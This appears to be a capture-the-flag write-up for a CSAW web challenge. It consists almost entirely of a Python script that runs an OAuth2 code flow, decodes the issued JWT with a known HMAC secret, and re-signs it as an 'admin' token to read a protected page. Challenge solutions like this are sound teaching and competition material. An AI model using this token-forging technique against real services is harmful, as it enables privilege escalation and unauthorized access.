Tags: jwt
Rating: 4.0
Running thing Code will get you flag
```
import requests
import jwt
#Authorization Request
code = requests.post("http://web.chal.csaw.io:9000/oauth2/authorize", headers={"Content-Type": "application/json"}, json={"response_type":"code","redirect_uri":"http://web.chal.csaw.io:9000/protected"}, allow_redirects=False).text
code = code.split("protected?code=")[1].split("&")[0]
#Access Token Request
r = requests.post("http://web.chal.csaw.io:9000/oauth2/token", json={"grant_type":"authorization_code","code": code,"redirect_uri":"http://web.chal.csaw.io:9000/protected"}).text
token = r.split('"')[7]
#Modifing Token as admin
res= jwt.decode(token, 'ufoundme!', algorithms=['HS256'])
token = jwt.encode({'type': 'admin', 'secret': 'ufoundme!', 'iat': res['iat'], 'exp': res['exp']}, 'ufoundme!', algorithm='HS256')
#Final Request
req = requests.get("http://web.chal.csaw.io:9000/protected", headers={"Authorization": "Bearer " + token}).text
print(req)
```